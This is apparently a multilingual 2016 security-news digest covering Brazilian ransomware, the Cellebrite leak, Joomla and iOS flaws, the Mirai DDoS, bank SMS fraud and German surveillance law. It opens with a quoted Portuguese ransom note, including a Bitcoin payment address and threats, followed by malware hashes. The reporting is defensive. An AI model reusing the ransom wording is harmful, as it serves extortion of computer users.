Caso o pagamento não seja efetuado, todos os seus dados serão bloqueados
permanentemente e o seu computador sera totalmente formatado
(Perdendo assim, todas as informações contidas nele, incluindo senhas de email, bancárias…)
O pagamento deverá ser efetuado nesse endereço de Bitcoin:
1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4
Para converter seu saldo em bitcoins acesse o site:
https://www.mercadobitcoin.com.br/conta/register/
Growth of ransomware in Brazil
The growth of ransomware in Brazil has been nothing short of impressive, taking into consideration that during October 2016 alone the popular ransomware family Packed.NSIS.MyxaH.gen family grew by 287.96%, and another of the usual suspects Trojan-Ransom.Win32.CryptXXX.gen grew by 56.96%, (when compared to the previous month in each case.)
In 2016, the 3 most important families of ransomware have been Trojan-Ransom.Win32.Blocker, accounting for 49.63% of the total infections,
Trojan-Ransom.NSIS.Onion, 29.09%, and Trojan-Ransom.Win32.Locky, 3.99%.
Currently, Brazil is the eighth most affected country worldwide as far as ransomware infections go for this year, and ranked first in Latin America.
Indicators of compromise
File: 04.exe
Size: 1049600
MD5: 86C85BD08DFAC63DF65EAEAE82ED14F7
Compiled: Saturday, October 8 2016, 11:22:30 – 32 Bit .NET
File: tmp.exe
Size: 842220
MD5: BB4FDC93E0C089F6B885FFC13024E4B9
Compiled: Sunday, January 29 2012, 21:32:28 – 32 Bit
Hacking Firmware from Mobile Phone Hacking Company Leaked Online
26.10.2016 thehackernews Mobil
The Israeli firm Cellebrite, which provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had its firmware and software leaked online.
Yes, you heard that right. Cellebrite's most sensitive in-house capabilities have been made public by one of its products' resellers, who is now distributing copies of Cellebrite's firmware and software for anyone to download.
The apparent reseller is McSira Professional Solutions, which hosts software for various versions of Cellebrite's Universal Forensic Extraction Device (UFED).
UFED is one of the company's key products that help investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data and passwords from them.
For the Cellebrite's hand on iOS devices, you can watch the 2015 YouTube video (below), which demonstrates one of the company's products that unlocked the iPhone device in few hours.
Download Links to Cellebrite's Key Forensic Product
McSira is allowing anyone to download the firmware for the UFED Touch and UFED 4PC (PC version). The company is also hosting copies of UFED packages for different mobile phone brands, including Apple, Samsung, Blackberry, Nokia, and LG.
Besides this, McSira is also hosting copies of Cellebrite forensic software, such as the UFED Phone Detective, UFED Cloud Analyzer and Link Analyzer, which allows investigators to analyze seized data further.
McSira is likely offering these download links for firmware and software files so that its customers – which, according to its site, are "police, military and security agencies in the E.U. and other parts of the world" – can conveniently update their hardware to the latest version.
However, the company opened doors for researchers, hackers, and its competitors to download these leaked files, reverse-engineer them, and figure out how Cellebrite's tools break into mobile phones.
Researcher Started Examining leaked Software and Firmware
According to Joseph Cox, freelance security journalist for Motherboard, an unnamed researcher has already started examining the leaked files to disclose the kind of exploits Cellebrite uses to bypass even strong security mechanisms on mobile phones, as well as weaknesses in the implementation of affected phones that could be fixed.
Another researcher Pedro Vilaça from SentinelOne said he already cracked some of the Cellebrite software and ran it against an old iPad, though he said he needed to explore the leaked files more to understand the capability of those software better.
"Doesn't seem to be trying to exploit things but just data extraction," Vilaça told Motherboard. "For example, I'd to pair my device with iTunes for the logical extraction feature to work."
Mike Reilly, a PR firm representative that works with Cellebrite, said the McSira website's links "don't allow access to any of the solutions without a license key," meaning that downloaders need a key (code) given by Cellebrite or its reseller to run those software.
At the time of writing, McSira is hosting these files, but it is not clear how long the files will be hosted on its website.
McSira and Cellebrite have yet to comment on the matter
Vyděračské viry na vzestupu, patří mezi nejrozšířenější hrozby na světě
26.10.2016 Novinky/Bezpečnost Viry
Škodlivé kódy z rodiny ransomware, jak jsou označovány vyděračské viry, se vůbec poprvé dostaly na přední příčky žebříčku nejrozšířenějších počítačových hrozeb. To jinými slovy znamená, že kyberzločincům se daří tyto nezvané návštěvníky propašovávat do cizích PC stále častěji. Vyplývá to z analýzy antivirové společnosti Check Point.
Nejrozšířenějším virem vůbec byl v září Conficker, jak Novinky informovaly již dříve. [celá zpráva]
Druhá příčka pak patří škodlivému kódu Satily a třetí právě vyděračskému viru. „Vůbec poprvé se v rámci výzkumu dostal ransomware do Top 3 nejrozšířenějších malwarových rodin. Ransomware Locky byl zodpovědný v průběhu září za 6 procent všech detekovaných útoků po celém světě,“ prohlásil David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Celkově útoky ransomwaru za září stouply o 13 procent. Právě Locky dělá bezpečnostním expertům velké vrásky na čele. Používá totiž poměrně sofistikované šifrování. Jde o obdobu toho, jaké používají finanční instituce při zabezpečení plateb po internetu.
Výkupné neplatit
V případě Lockyho kyberzločinci infikují systém e-mailem s wordovou přílohou, která obsahuje škodlivé makro. Jakmile uživatel soubor otevře, makro spustí skript, který stáhne spustitelný škodlivý soubor, nainstaluje se na počítač oběti a vyhledává soubory, které šifruje. Uživatel potom ani neví, že útok začal právě kliknutím na e-mailovou přílohu.
Kyberzločinci se pak zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.
Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu. [celá zpráva]
Česko je v hledáčku pirátů stále častěji
Společně se statistikami nejrozšířenějších virových hrozeb zveřejnila společnost Check Point také žebříček zemí, které jsou nejčastěji terčem kyberútoků.
A pro tuzemské uživatele tato data nevyznívají ani trochu pozitivně. „Česká republika se v září umístila na 72. pozici, což je vzestup o 16 míst a posun mezi méně bezpečné země. O 16 míst se posunulo mezi méně bezpečné země i Slovensko, které je nyní na 61. pozici,“ konstatoval Řeháček.
„Naopak nejvýrazněji se mezi bezpečnější země posunul Kazachstán, který klesl o 47 míst na 55. pozici. Největší posun mezi nebezpečnější země zaznamenalo Portoriko, které se posunulo o 55 míst na 47. pozici. Na prvním místě se v Indexu hrozeb umístila Botswana, která poskočila o 19 míst,“ uzavřel.
Zjednodušte si šifrování pro mobilní komunikaci
26.10.2016 SecurityWorld Mobilní
Babelbox, miniserver pro šifrovanou komunikaci se systémy s Windows nebo MacOS a s mobilními zařízeními na platformách iOS, Android a BlackBerry, představila firma OKSystem.
Novinka se dodává jako předinstalovaná aplikace Babelnet (verze Enterprise) na mini PC HP Elite Desk 400 G2 s licencí pro 5, 10 nebo 15 uživatelů. Cena přitom začíná na 42 750 Kč.
Babelnet podle výrobce kombinuje silné kryptografické algoritmy a protokoly pro zajištění autenticity, soukromí a integrity při zasílání i uložení zpráv a dokumentů na počítačích a mobilních zařízeních.
Babelnet klient se instaluje na mobilní zařízení či počítače a okamžitě se připojí k serveru ve firemní síti, Babelboxu či cloudu. Firemní instalace umožní snadný dohled, integraci a správu uživatelů a zařízení.
Babelnet rovněž podporuje jednoduchou integraci s aplikacemi třetích stran (DMS, HR, CRM…) a zajišťuje tak automatizovaný a bezpečný přenos informací a dokumentů z firemních aplikací k uživatelům.
Podle průzkumu OKSystemu na vzorku 2 173 tuzemských právníků, manažerů, top managerů, majitelů firem, akcionářů a generálních ředitelů podniků má 80 % oslovených manažerů obavu, že někdo má zájem získávat informace z jejich pracovní, osobní nebo firemní komunikace.
„Malé firmy často nemají vlastní IT odborníky a potřebují jednoduše nasaditelné systémy nenáročné na údržbu,“ tvrdí šéf vývoje a spoluzakladatel společnosti OKsystem Ivo Rosol. Podle něj právě systém, který jejich firma představila, zajistí komunikační bezpečnost i pro nejmenší společnosti.
Funkce Babelboxu podle výrobce:
Webová admin konzole
Správa a konfigurace
Účty uživatelů a skupin
Správa zařízení
Distribuce veřejných klíčů
API pro integraci
Možnost připojení USB LTE modemu v případě nedostupnosti sítě
Domain Hijacking – An Invisible and Destructive Threat We Should Watch For
26.10.2016 securityaffairs Hacking
The Morphus Labs warns about another major threat, the domain hijacking incident, a threat that can completely subvert your information security strategy.
The Morphus Labs warns this week about another major threat. Renato Marinho and Victor Pasknel treated a domain hijacking incident, a threat that can completely subvert your information security strategy. They give details in this article how the incident was handled and how we can prevent similar scenarios.
Introduction
It’s Saturday morning and you, the CSO of a huge company, start to receive messages from various sources, including press, informing that all of your organization Internet addresses are getting visitors to fake websites offering malicious content in form of fake security modules and/or updates.
What appeared to be a website defacement attack, turned out to be something much worse. In examining more closely, you realize that cybercriminals did, in fact, the kidnapping of the entire organization domain and directed all addresses to fake websites aiming to steal information from your customers and spreading malicious code. The worst thing is that there was no action that depended exclusively on you to solve the problem immediately.
In this article, we describe the incident response to the scenario described above and how this threat, being capable to subvert your entire strategy and security investment, can be mitigated with very simple actions.
Domain Name System (DNS) basics
To better understanding what happened, it’s important to understand some basic DNS concepts. If you are familiar with this subject, just jump to section 3.
DNS stands for Domain Name System and works as a foundation for the Internet . All addresses names we use daily to reach Websites and other Internet services have to be translated to IP (Internet Protocol); the translation or resolution process between an internet address name and IP address is the main role of DNS Servers.
DNS Servers work as a hierarchy of sorts, where the resolution requests are passed through it to the right server that is in charge of resolving the names for a certain domain, is reached. The root of this hierarchy, that is the invisible domain dot (“.”) in the end of any Internet address, is controlled by a group of DNS Servers distributed in different places around the world. Those root DNS Servers have to know the IP address of the DNS Servers that are in charge of all Top Level Domains (TLD), like the “.com”. The “.com” DNS servers in turn, have to know the IP address of the DNS Servers that are in charge of your company’s domain name, like “yourdomain.com” and so on.
For example, when someone asks for “www.yourdomain.com.”, the request reaches the root servers (“.”) that in turn, reaches the “.com” servers, that in turn, reach your company’s DNS servers, that finally resolves the address “www” and return the correct IP address.
The TLDs are controlled and managed by registry operators, also called Network Information Center (NIC). The registry operators manage the registration of domain names within the domains for which they are responsible. So, the “.com” registry operator is the organization that will hold the configuration of the DNS Servers IP addresses that are in charge of resolving the IP address of a domain like “yourcompany.com”.
Domain Hijacking
For you to register or manage a domain in any registry operator, you have to previously create an account (basically, username and password) on their web portal. This account will be used to manage the IP addresses of the DNS Servers that will point to the IP addresses of your website or e-mail servers.
Note that the access credentials to the portal operator are extremely sensitive information. Someone malicious in possession of such information would be able to change any configuration of your domains, including IP addresses of the DNS servers. In short, could hijack the Internet Domain of your company and target websites and emails to any address he wanted.
In the incident we treated at Morphus Labs, that’s exactly what happened. The bad actors stole the registry operator’s credentials and changed the primary and secondary DNS servers configuration pointing them to the criminals’ ones. After that, all the company’s customers were directed to a fake company website to download malicious content they were suggested by the fake content. We can imagine what the criminals’ strategy was had they had success spreading their malware.
Needless to say, the crooks changed the password after gaining access to the portal. In other words, they hijacked the domain and made the recovery dependable of the registry operator. “Manual” account recover is usually not easy nor fast.
The Incident Response
Unlike the majority of cyber incidents, you have almost nothing to do in your infrastructure itself to revert the situation, like recovering backup or configurations. Like what happened in this incident, all servers were intact.
Read the full article: https://www.linkedin.com/pulse/domain-hijacking-invisible-destructive-threat-we-should-marinho
And works as the foundation of the internet “ou” and works as a foundation for the internet.
Please, revise if the meaning was kept.
Bad actors? Is this expression clear to the reader?
Two Critical Vulnerabilities Patched in Joomla 3.6.4. Update it asap!
26.10.2016 securityaffairs Vulnerebility
Joomla has released the new version Joomla 3.6.4 that fixes two critical account creation vulnerabilities affecting the popular CMS.
Recently we discussed cyber attacks in the wild leveraging on compromised websites running Joomla CMS. For example, in February, security experts observed a spike in the number of compromised Joomla-base websites used in Admedia attacks.
This week a new release of the Joomla CMS was released, Joomla 3.6.4 version, and fixes two critical account creation vulnerabilities.
Both vulnerabilities have been rated high severity, the developers at the team fixed both in a few days.
The first flaw, tracked as CVE-2016-8870, could be exploited by an attacker to register on a website even when the registration has been disabled. The vulnerability affects the Joomla core in versions 3.4.4 through 3.6.3.
“Inadequate checks allows for users to register on a site when registration has been disabled.” states the description of the flaw published by Joomla.
The second flaw, tracked as CVE-2016-8869, can be exploited by users to register on a website, but with elevated privileges.
“Incorrect use of unfiltered data allows for users to register on a site with elevated privileges.” states the description of the flaw published by Joomla.
The flaw was reported by Davide Tampellini on October 21, is caused by incorrect use of unfiltered data. Joomla versions affected ranges from 3.4.4 through 3.6.3.
The Joomla! Security Strike Team (JSST) urges administrators of websites running the popular CMS to update and patch their installations as soon as possible.
Now that the flaws have been publicly disclosed, crooks will try to exploit them in order to compromise websites and use them for illegal activities, for this reason, it is essential to urgently apply the updates.
Přepošli mi tuhle zprávu, zkouší napálit důvěřivce na Facebooku podvodníci
25.10.2016 Novinky/Bezpečnost Sociální sítě
Česká spořitelna varovala před novou vlnou podvodů, která se šíří především prostřednictvím sociální sítě Facebook. Zprávami se podvodníci snaží vylákat autorizační kódy k transakcím provedeným přes internetové bankovnictví.
Ukázka podvodné zprávy
Na první pohled se může zdát, že žádosti o přeposlání potvrzovací SMS zprávy chodí od skutečných přátel. Ve skutečnosti však počítačoví piráti využívají napadené a podvodné účty na Facebooku. Za skutečné přátele se tedy pouze vydávají.
„Podvodník osloví klienta z profilu některého z jeho přátel, že má problém s telefonem. Následně klienta požádá, jestli si může nechat poslat autorizační SMS na jeho telefon s tím, aby mu ji klient pak přeposlal,“ varovali zástupci České spořitelny.
SMS zprávy nikomu nepřeposílat
Právě v tom je ale kámen úrazu. „Tato SMS však ve skutečnosti patří klientovi a jejím přeposláním umožní podvodníkovi autorizovat platby ze svého vlastního účtu. Skutečný majitel profilu, kterým podvodník klienta osloví, o podvodu pravděpodobně vůbec netuší,“ stojí v prohlášení banky.
Na podobné žádosti by uživatelé neměli vůbec reagovat. „Nikdy nikomu nepřeposílejte autorizační SMS kódy. Pokud jste to už ale udělali, doporučujeme vám okamžitě kontaktovat naši bezplatnou informační linku 800 207 207,“ podotkli zástupci spořitelny.
Není vyloučeno, že podvodníci se podobným způsobem budou snažit napálit také uživatele jiných finančních institucí, případně budou podobný styl útoků zkoušet také přes jiné komunikační kanály. Obezřetnost je tak namístě.
Pasti na Facebooku
Na Facebook se počítačoví piráti zaměřují celkem často. Před časem například pod hlavičkou České spořitelny lákali na nabídky, ve kterých slibovali za použití nové verze internetového bankovnictví finanční bonus ve výši 1000 Kč.
Podvodná nabídka na Facebooku
Ve skutečnosti samozřejmě o žádnou novou verzi internetového bankovnictví nejde. Kyberzločinci se pouze touto nabídkou na sociální síti snaží vylákat z důvěřivců jejich přihlašovací údaje. Poté jsou jen krůček od toho, aby lidem vybílili účet nebo si prostřednictvím něj sjednali nějakou půjčku.
V podstatě jim stačí propašovat na chytrý telefon virus, prostřednictvím kterého budou schopni odchytávat potvrzovací SMS zprávy. Nezvaných návštěvníků s touto schopností kolují internetem desítky, riziko nakažení tedy není vůbec nepravděpodobné.
Případně jim stačí o potvrzovací zprávu požádat z jiného napadeného počítače, jak bylo popsáno už v úvodu tohoto článku.
Útočníci obejdou i autorizační SMS z banky. Stačí jim k tomu Facebook
25.10.2016 Živě.cz Mobilní
Česká spořitelna varuje před útočníky, kteří využívají Facebook pro získání autorizačních kódů internetového bankovnictví. Ty jsou standardně doručovány formou textové zprávy. Pokud se například díky phishingu dostanou přes přihlašovací formulář do správy účtu, stále jim budou scházet potvrzovací kódy, které by jim umožnily přeposlat peníze na vlastní účty.
Americký úřad varuje: dvouúrovňové ověřování pomocí SMS není bezpečné
Pro jejich vylákání využívají triviálního triku na Facebooku. Uživateli napíší zprávu s tím, že jim jejich vlastní zpráva nedorazila a zda ji mohou nechat poslat na telefon oběti. Té sice autorizační SMS dorazí, nicméně s kódem k vlastnímu účtu. Pokud jej potom útočníkovi přepošle, nic mu nebrání ve vykradení účtu. Pro věrohodnější postup může útočník použít kradený účet na Facebooku, takže si oběť myslí, že opravdu komunikuje se svým kamarádem.
Ukázka zprávy na Facebooku, která má od oběti vylákat autorizační kód z SMS
(zdroj: Česká spořitelna)
Podobné podvody, které obsahují prvky sociálního inženýrství nebo znalostního hackingu ostatně v létě přiměli americký bezpečnostní úřad prohlásit ověřování pomocí SMS za nedostatečné. Náhradou by se v budoucnu měli stát autorizační aplikace nebo biometrická autentizace.
Dejte si pozor na Hicurdismos, malware, který se tváří jako Microsoft Security Essentials
25.10.2016 Živě.cz Viry
Microsoft na svém blogu upozorňuje uživatele na hrozbu, která má název Hicurdismos. Jde o škodlivý software, který je zabalený do falešného instalačního souboru bezpečnostního balíku Microsoft Security Essentials.
Vlevo instalační soubor Microsoftu, vpravo ten s malwarem
Pokud si uživatel malware stáhne a nainstaluje, začne mu zobrazovat modrou obrazovku smrti – samozřejmě také falešnou. Na té však nenajde informace o tom, že má počítač restartovat a další běžný postup, ale telefonní číslo technické podpory pro vyřešení problému. Pokud na něj neznalý uživatel opravdu zavolá, automat jej donutí ke stažení dalšího malwaru nebo rovnou bude žádat o platbu.
Obrazovka se tváří jako běžná BSoD, na konci však najdete telefonní číslo technické podpory. Ta bude žádat platbu nebo stažení dalšího malwaru
Problém se bude týkat především uživatelů ve Spojených státech či Kanadě, ty tuzemské by mělo odradit především zahraniční telefonní číslo. Pravdou však je, že balík Microsoft Security Essential není třeba ve Windows 8.1 a Windows 10 stahovat, neboť obsahuje totožný bezpečnostní software v podobě Windows Defender.
WhatsApp Video Calling is Now Available for Android – Download Beta Version Now!
25.10.2016 thehackernews Android
WhatsApp is, no doubt, the largest end-to-end encrypted messaging network that allows over billion of its users to send messages, photos, videos, voice messages, documents, and calls that are secure from falling into the wrong hands.
And now it seems like WhatsApp is rolling out a much-awaited feature for the new beta versions of its Android app: Video Calling.
New beta version 2.16.318 of WhatsApp brings the ability for users to conduct video calls.
In order to activate video calls, you simply need to pull up a contact in the WhatsApp app, tap on the call icon and choose "Video Call." You can also go direct to the Calls tab to begin with the option.
The Video calls will only work if both the caller as well as the receiver have the same beta build of WhatsApp that supports the feature. If not, you will be notified with an error message that your contacts needs to update their app.
Download the latest build for WhatsApp Android from APKMirror now and give it a try.
For now, the Video calling feature is limited to WhatsApp's recent beta builds, reported Android Police, which first spotted the feature. So, you either need to download the APK link mentioned above or sign up to become a beta tester and update to WhatsApp (Beta) straight from the Google Play Store.
However, even if the feature doesn't work, there is a possible trick that you can try in order to activate the WhatsApp Video Calling feature.
Possible Trick to Activate WhatsApp Video Calling Feature
You simply need to follow these steps:
Backup all your chats,
Wipe WhatsApp data,
Log in again on WhatsApp.
You can try the above trick that had helped some users activate the video calling feature, but make sure you successfully backup your chats first.
Reportedly, WhatsApp Video Calling feature also provides an option to mute the call. You can even switch between the front and rear camera on your phone, just like any other video calling apps. Your app's call history list now displays both video and voice calls.
With its release in a stable version for over 1 Billion users in the coming weeks, the WhatsApp Video Calling feature could effectively ruin the market for Google's video calling app Duo, which has been released just few month ago.
Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet
25.10.2016 thehackernews Security
You might be surprised to know that your security cameras, Internet-connected toasters and refrigerators may have inadvertently participated in the massive cyber attack that broke a large portion of the Internet on Friday.
That's due to massive Distributed Denial of Service (DDoS) attacks against Dyn, a major domain name system (DNS) provider that many sites and services use as their upstream DNS provider for turning IP addresses into human-readable websites.
The result we all know:
Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, were among hundreds of sites and services that were rendered inaccessible to Millions of people worldwide for several hours.
Why and How the Deadliest DDoS Attack Happened
It was reported that the Mirai bots were used in the massive DDoS attacks against DynDNS, but they "were separate and distinct" bots from those used to execute record-breaking DDoS attack against French Internet service and hosting provider OVH.
Here's why: Initially the source code of the Mirai malware was limited to a few number of hackers who were aware of the underground hacking forum where it was released.
But later, the link to the Mirai source code suddenly received a huge promotion from thousands of media websites after it got exclusively publicized by journalist Brian Krebs on his personal blog.
Due to the worldwide news release and promotion, copycat hackers and unprofessional hackers are now creating their own botnet networks by hacking millions of smart devices to launch DDoS attacks, as well as to make money by selling their botnets as DDoS-for-hire service.
Mirai malware is designed to scan for Internet of Things (IoT) devices – mostly routers, security cameras, DVRs or WebIP cameras, Linux servers, and devices running Busybox – that are still using their default passwords. It enslaves vast numbers of these devices into a botnet, which is then used to launch DDoS attacks.
Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack
More such attacks are expected to happen and will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.
One such IoT electronic manufacturer is Chinese firm Hangzhou Xiongmai Technology which admitted its products – DVRs and internet-connected cameras – inadvertently played a role in the Friday's massive cyber attack against DynDNS.
The Mirai malware can easily be removed from infected devices by rebooting them, but the devices will end up infecting again in a matter of minutes if their owners and manufacturers do not take proper measures to protect them.
What's worse? Some of these devices, which include connected devices from Xiongmai, can not be protected because of hardcoded passwords, and the fact that their makers implemented them in a way that they cannot easily be updated.
"Mirai is a huge disaster for the Internet of Things," the company confirmed to IDG News. "[We] have to admit that our products also suffered from hacker's break-in and illegal use."
The company claimed to have rolled out patches for security vulnerabilities, involving weak default passwords, which allowed the Mirai malware to infect its products and use them to launch massive DDoS attack against DynDNS.
However, Xiongmai products that are running older versions of the firmware are still vulnerable. To tackle this issue, the company has advised its customers to update their product's firmware and change their default credentials.
The electronics components firm would also recall some of its earlier products, specifically webcam models, sold in the US and send customers a patch for products made before April last year, Xiongmai said in a statement on its official microblog.
Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack
Even worse is expected:
The Friday's DDoS attack that knocked down half of the Internet in the U.S. is just the beginning because hackers have started selling access to a huge army of hacked IoT devices designed to launch attacks that are capable of severely disrupting any web service.
The seller claimed their botnet could generate 1 Terabit of traffic that’s almost equal to the world's largest DDoS attack against OVH earlier this month, Forbes reported.
Anyone could buy 50,000 bots for $4,600, and 100,000 bots for $7,500, which can be combined to overwhelm targets with data.
Hacker groups have long sold access to botnets as a DDoS weapon for hire – like the infamous Lizard Squad's DDoS attack tool Lizard Stresser – but those botnets largely comprised of compromised vulnerable routers, and not IoT devices like connected cameras, toasters, fridges and kettles (which are now available in bulk).
In a separate disclosure, a hacking group calling itself New World Hackers has also claimed responsibility for the Friday's DDoS attacks, though it is not confirmed yet.
New World Hackers is the same group that briefly knocked the BBC offline last year. The group claimed to be a hacktivist collective with members in China, Russia, and India.
Well, who is behind the Friday's cyber attack is still unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks hit DynDNS, but none of the agencies yet speculated on who might be behind them.
The DynDNS DDoS attack has already shown the danger of IoT-based botnets, alarming both IoT manufacturers to start caring about implementing security on their products, and end users to start caring about the basic safety of their connected devices.
Warning! Your iPhone Can Get Hacked Just by Opening a JPEG Image, PDF or Font File
25.10.2016 thehackernews Apple
What's worse than knowing that innocent looking JPEGs, PDFs and font files can hijack your iPhone, iPad, and iPod.
Yes, attackers can take over your vulnerable Apple's iOS device remotely – all they have to do is trick you to view a maliciously-crafted JPEG graphic or PDF file through a website or an email, which could allow them to execute malicious code on your system.
That's a terrible flaw (CVE-2016-4673), but the good news is that Apple has released the latest version of its mobile operating system, iOS 10.1, for iPhones and iPads to address this remote-code execution flaw, alongside an array of bug fixes.
And now that the company has rolled out a security patch, some hackers would surely find vulnerable Apple devices to exploit the vulnerability and take full control of them.
So, users running older versions of iOS are advised to update their mobile devices to iOS 10.1 as soon as possible.
Besides this remote code execution flaw, the newest iOS 10.1 includes security updates to address 11 security flaws in the firmware for the iPhone, iPad, and iPod Touch.
Those flaws include local code execution vulnerabilities, a remote code execution bug in WebKit (CVE-2016-4677), a flaw in contacts (CVE-2016-4686) that would allow an application to pull Address Book details even when access has been revoked.
To update your iOS device go to Settings → General → Software Update.
Security Updates for Mac, Apple Watch, and AppleTV
Apple has also released security updates for Mac PCs, Apple Watches and Apple TVs.
So, Mac users are advised to update their system to macOS Sierra (10.12.1), which includes security fixes for 16 CVE-listed vulnerabilities.
Those weaknesses include an image-handling bug (CVE-2016-4673), a denial of service (DoS) error in Nvidia graphics card drivers, a bug that exposed the length of user passwords and Remote Code Execution (RCE) flaws that could be triggered by font files and PDF files, among others.
Meanwhile, Apple Watch users are recommended to update their devices to watchOS 3.1, which includes fixes for 8 security flaws.
Those flaws include 2 vulnerabilities in sandbox profiles that could allow third-party apps to view image libraries and sound files without permission.
AppleTV users are also advised to update their devices to tvOS 10.0.1, which includes patches for 10 vulnerabilities, including the WebKit remote code execution flaw, the sandbox profiles flaws, and the CoreGraphics JPEG flaw.
So get your Apple device patched before getting caught by hackers.
The German parliament passes controversial a surveillance law
25.10.2016 securityaffairs BigBrothers
The German Parliament passed a controversial surveillance law that seems to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that theoretically will tighten oversight of the BND intelligence agency, but that according to privacy advocates will give more power to the authorities.
The experts focused their critic on a controversial clause of the law that allows the BND to eavesdrop communications of foreign organizations and individuals on German soil and abroad that is in transit through a major internet exchange point in Frankfurt.
The Frankfurt-based operator DE-CIX in September filed a suit at a court in Leipzig against the government due to the new law that is considered illegal.
The German Government sustains that the measured approved by the surveillance law will allow it to investigate online crime and terrorism.
“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger a lawmaker with Chancellor Angela Merkel’s conservative party.
In the past, the BND was not authorized from spying its population, but the new controversial surveillance law will allow it under specific circumstances.
BND was only allowed to monitor up to 20 percent of traffic at one exchange point, but the new law gives full power and no limitation to the agency while spying on the Internet traffic.
“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans.” reads a blog post published by the Reuters.
The Greens are expressing their disappointment to the law and have threatened to petition Germany’s highest court and the European Court of Justice to repeal the surveillance law.
This law is considered a serious threat to the privacy of the Germans, politicians and privacy defenders fear a dragnet surveillance.
Lawmaker Martina Renner of the hard-left Left party speculates the monitoring equipment used by the BND is not able to discern messages sent by foreigners from those of the Germans.
Surveillance activities conducted by the BND raised an intense debate on the internal political front. According to revelations published by the Der Spiegel, the agency supported the NSA in its global surveillance activities.
Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um. Foto: Johannes Simon/ ddp
Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um.
Foto: Johannes Simon/ ddp
The BND helped NSA in monitoring European politicians, the Intelligence Agency targeted private companies and entities worldwide in order to establish a dominance in the cyberspace. Among the victims, there was also the German Government and its politicians, including the chancellor Angela Merkel. The German Government was shocked at the time and expressly manifest his dissent to President Obama.
The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus planes) and Eurocopter, and European politicians, including German ones.
In August, the German weekly Die Zeit disclosed documents that reveal how the German Intelligence did a deal with the NSA to get the access to the surveillance platform XKeyscore.
Internal documents show that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return of data from Germany.
Back in 2o11, the NSA demonstrated the capabilities of the XKeyscore platform of the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware software and install it for analyzing metadata collected on German citizens. In return, the German Agency promised to share metadata collected.
The NSA tool collects ‘nearly everything a user does on the internet’, XKeyscore gives ‘widest-reaching’ collection of online data analyzing the content of emails, social media, and browsing history.
In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.
According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.
The BfV didn’t provide the details of the agreement to Germany’s data protection commissioner, nor it informed the Parliamentary Control Panel.
In January, the BND has resumed its internet surveillance with the support of the NSA, the activities were suspended following the revelation on the mutual espionage activities. In July 2015 Wikileaks revealed an extended economic espionage activity conducted by the NSA in Germany, the spies were particularly interested in the Greek debt crisis.
Back to the new German surveillance law, it bans the Intelligence from spying on EU countries and its citizens, as well as EU institutions, except in the case of investigation of terrorist activity.
“It also requires the BND to submit requests for cooperation with other spy agencies with a parliamentary committee and bans the agency from carrying out industrial espionage.” states the Reuters.
“It requires the head of the BND, the chancellor’s office and an independent panel of judges to approve strategic foreign espionage activities.”
Discovery of Weapons Cache Reignites Fears ISIS Will Use Chemical Weapons in Battle for Mosul
25.10.2016 securityaffairs Cyber
The battle in Mosul of the international coalition against the ISIS is expected to become the largest battle fought in Iraq since the US-led operation in 2003.
According to the Iraqi army, approximately 50 villages have been taken from the ISIS since last Monday, as the army prepares for the onslaught on Mosul, where 5,000 to 6,000 ISIS fighters are believed to remain.
The international coalition battling to eradicate ISIS in Mosul is a disparate assembly, lacking true cohesion as each has its own reasons for fighting in this offensive.
“It’s a very, very dangerous cocktail,” Marina Ottaway, a Middle East expert at the Woodrow Wilson International Center for Scholars, said. “This is a group with completely different end-goals. There is a real fear that when they get rid of ISIS from Mosul then things are really going to blow up.”
The Key Players and Their Motivations:
Iraqi Security Forces – Leading the mission to recapture Mosul are Iraq’s security forces. In charge of a coalition of some 65,000 troops, the Iraqis have returned to the scene of their defeat reenergized and trained and equipped by the US. In recent months, they’ve amassed a few victories in liberating other ISIS-held areas.
